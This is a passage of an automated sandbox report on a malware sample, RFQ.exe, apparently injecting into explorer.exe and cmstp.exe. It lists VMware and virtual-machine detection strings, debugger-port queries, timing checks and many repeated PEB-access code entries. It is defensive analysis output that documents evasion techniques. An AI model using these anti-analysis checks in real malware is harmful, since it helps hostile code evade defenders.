          Source: explorer.exe, 00000002.00000000.256035908.00000000088C3000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.255528652.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.255258920.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.247683405.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000000.255728761.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000002.00000000.255728761.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.255798043.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000002.00000002.498238237.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.255258920.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.255258920.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000002.00000000.255258920.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\RFQ.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00409A80 rdtsc 1_2_00409A80
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040ACC0 LdrLoadDll,1_2_0040ACC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36CF0 mov eax, dword ptr fs:[00000030h]6_2_04E36CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36CF0 mov eax, dword ptr fs:[00000030h]6_2_04E36CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36CF0 mov eax, dword ptr fs:[00000030h]6_2_04E36CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E714FB mov eax, dword ptr fs:[00000030h]6_2_04E714FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E88CD6 mov eax, dword ptr fs:[00000030h]6_2_04E88CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC849B mov eax, dword ptr fs:[00000030h]6_2_04DC849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74496 mov eax, dword ptr fs:[00000030h]6_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEA44B mov eax, dword ptr fs:[00000030h]6_2_04DEA44B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEAC7B mov eax, dword ptr fs:[00000030h]6_2_04DEAC7B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB477 mov eax, dword ptr fs:[00000030h]6_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD746D mov eax, dword ptr fs:[00000030h]6_2_04DD746D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E4C450 mov eax, dword ptr fs:[00000030h]6_2_04E4C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E4C450 mov eax, dword ptr fs:[00000030h]6_2_04E4C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE3C3E mov eax, dword ptr fs:[00000030h]6_2_04DE3C3E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE3C3E mov eax, dword ptr fs:[00000030h]6_2_04DE3C3E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE3C3E mov eax, dword ptr fs:[00000030h]6_2_04DE3C3E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E71C06 mov eax, dword ptr fs:[00000030h]6_2_04E71C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E8740D mov eax, dword ptr fs:[00000030h]6_2_04E8740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E8740D mov eax, dword ptr fs:[00000030h]6_2_04E8740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E8740D mov eax, dword ptr fs:[00000030h]6_2_04E8740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36C0A mov eax, dword ptr fs:[00000030h]6_2_04E36C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36C0A mov eax, dword ptr fs:[00000030h]6_2_04E36C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36C0A mov eax, dword ptr fs:[00000030h]6_2_04E36C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36C0A mov eax, dword ptr fs:[00000030h]6_2_04E36C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEBC2C mov eax, dword ptr fs:[00000030h]6_2_04DEBC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7FDE2 mov eax, dword ptr fs:[00000030h]6_2_04E7FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7FDE2 mov eax, dword ptr fs:[00000030h]6_2_04E7FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7FDE2 mov eax, dword ptr fs:[00000030h]6_2_04E7FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7FDE2 mov eax, dword ptr fs:[00000030h]6_2_04E7FDE2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E68DF1 mov eax, dword ptr fs:[00000030h]6_2_04E68DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36DC9 mov eax, dword ptr fs:[00000030h]6_2_04E36DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36DC9 mov eax, dword ptr fs:[00000030h]6_2_04E36DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36DC9 mov eax, dword ptr fs:[00000030h]6_2_04E36DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36DC9 mov ecx, dword ptr fs:[00000030h]6_2_04E36DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36DC9 mov eax, dword ptr fs:[00000030h]6_2_04E36DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E36DC9 mov eax, dword ptr fs:[00000030h]6_2_04E36DC9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DCD5E0 mov eax, dword ptr fs:[00000030h]6_2_04DCD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DCD5E0 mov eax, dword ptr fs:[00000030h]6_2_04DCD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E805AC mov eax, dword ptr fs:[00000030h]6_2_04E805AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E805AC mov eax, dword ptr fs:[00000030h]6_2_04E805AC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEFD9B mov eax, dword ptr fs:[00000030h]6_2_04DEFD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEFD9B mov eax, dword ptr fs:[00000030h]6_2_04DEFD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DB2D8A mov eax, dword ptr fs:[00000030h]6_2_04DB2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DB2D8A mov eax, dword ptr fs:[00000030h]6_2_04DB2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DB2D8A mov eax, dword ptr fs:[00000030h]6_2_04DB2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DB2D8A mov eax, dword ptr fs:[00000030h]6_2_04DB2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DB2D8A mov eax, dword ptr fs:[00000030h]6_2_04DB2D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE2581 mov eax, dword ptr fs:[00000030h]6_2_04DE2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE2581 mov eax, dword ptr fs:[00000030h]6_2_04DE2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE2581 mov eax, dword ptr fs:[00000030h]6_2_04DE2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE2581 mov eax, dword ptr fs:[00000030h]6_2_04DE2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E72D82 mov eax, dword ptr fs:[00000030h]6_2_04E72D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E72D82 mov eax, dword ptr fs:[00000030h]6_2_04E72D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E72D82 mov eax, dword ptr fs:[00000030h]6_2_04E72D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E72D82 mov eax, dword ptr fs:[00000030h]6_2_04E72D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E72D82 mov eax, dword ptr fs:[00000030h]6_2_04E72D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E72D82 mov eax, dword ptr fs:[00000030h]6_2_04E72D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E72D82 mov eax, dword ptr fs:[00000030h]6_2_04E72D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE1DB5 mov eax, dword ptr fs:[00000030h]6_2_04DE1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE1DB5 mov eax, dword ptr fs:[00000030h]6_2_04DE1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE1DB5 mov eax, dword ptr fs:[00000030h]6_2_04DE1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE35A1 mov eax, dword ptr fs:[00000030h]6_2_04DE35A1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD7D50 mov eax, dword ptr fs:[00000030h]6_2_04DD7D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF3D43 mov eax, dword ptr fs:[00000030h]6_2_04DF3D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E33540 mov eax, dword ptr fs:[00000030h]6_2_04E33540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E63D40 mov eax, dword ptr fs:[00000030h]6_2_04E63D40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDC577 mov eax, dword ptr fs:[00000030h]6_2_04DDC577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDC577 mov eax, dword ptr fs:[00000030h]6_2_04DDC577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E3A537 mov eax, dword ptr fs:[00000030h]6_2_04E3A537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E88D34 mov eax, dword ptr fs:[00000030h]6_2_04E88D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7E539 mov eax, dword ptr fs:[00000030h]6_2_04E7E539
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE4D3B mov eax, dword ptr fs:[00000030h]6_2_04DE4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE4D3B mov eax, dword ptr fs:[00000030h]6_2_04DE4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE4D3B mov eax, dword ptr fs:[00000030h]6_2_04DE4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC3D34 mov eax, dword ptr fs:[00000030h]6_2_04DC3D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DBAD30 mov eax, dword ptr fs:[00000030h]6_2_04DBAD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEF527 mov eax, dword ptr fs:[00000030h]6_2_04DEF527
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEF527 mov eax, dword ptr fs:[00000030h]6_2_04DEF527
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEF527 mov eax, dword ptr fs:[00000030h]6_2_04DEF527
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE36CC mov eax, dword ptr fs:[00000030h]6_2_04DE36CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF8EC7 mov eax, dword ptr fs:[00000030h]6_2_04DF8EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E6FEC0 mov eax, dword ptr fs:[00000030h]6_2_04E6FEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E88ED6 mov eax, dword ptr fs:[00000030h]6_2_04E88ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE16E0 mov ecx, dword ptr fs:[00000030h]6_2_04DE16E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC76E2 mov eax, dword ptr fs:[00000030h]6_2_04DC76E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E346A7 mov eax, dword ptr fs:[00000030h]6_2_04E346A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E80EA5 mov eax, dword ptr fs:[00000030h]6_2_04E80EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E80EA5 mov eax, dword ptr fs:[00000030h]6_2_04E80EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E80EA5 mov eax, dword ptr fs:[00000030h]6_2_04E80EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E4FE87 mov eax, dword ptr fs:[00000030h]6_2_04E4FE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC7E41 mov eax, dword ptr fs:[00000030h]6_2_04DC7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC7E41 mov eax, dword ptr fs:[00000030h]6_2_04DC7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC7E41 mov eax, dword ptr fs:[00000030h]6_2_04DC7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC7E41 mov eax, dword ptr fs:[00000030h]6_2_04DC7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC7E41 mov eax, dword ptr fs:[00000030h]6_2_04DC7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC7E41 mov eax, dword ptr fs:[00000030h]6_2_04DC7E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7AE44 mov eax, dword ptr fs:[00000030h]6_2_04E7AE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7AE44 mov eax, dword ptr fs:[00000030h]6_2_04E7AE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDAE73 mov eax, dword ptr fs:[00000030h]6_2_04DDAE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDAE73 mov eax, dword ptr fs:[00000030h]6_2_04DDAE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDAE73 mov eax, dword ptr fs:[00000030h]6_2_04DDAE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDAE73 mov eax, dword ptr fs:[00000030h]6_2_04DDAE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDAE73 mov eax, dword ptr fs:[00000030h]6_2_04DDAE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC766D mov eax, dword ptr fs:[00000030h]6_2_04DC766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEA61C mov eax, dword ptr fs:[00000030h]6_2_04DEA61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEA61C mov eax, dword ptr fs:[00000030h]6_2_04DEA61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E6FE3F mov eax, dword ptr fs:[00000030h]6_2_04E6FE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DBC600 mov eax, dword ptr fs:[00000030h]6_2_04DBC600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DBC600 mov eax, dword ptr fs:[00000030h]6_2_04DBC600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DBC600 mov eax, dword ptr fs:[00000030h]6_2_04DBC600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]6_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]6_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]6_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]6_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov ecx, dword ptr fs:[00000030h]6_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov ecx, dword ptr fs:[00000030h]6_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD5600 mov eax, dword ptr fs:[00000030h]6_2_04DD5600
